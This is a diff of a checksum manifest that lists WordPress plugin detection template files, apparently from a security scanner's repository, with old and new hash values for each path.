+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:cc889ada7c90d40cc71b72a0d9fc976cacfa3e85 +http/technologies/wordpress/plugins/sg-security.yaml:0ab396fbd10115bbd286e7c229ac887e727390b1 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 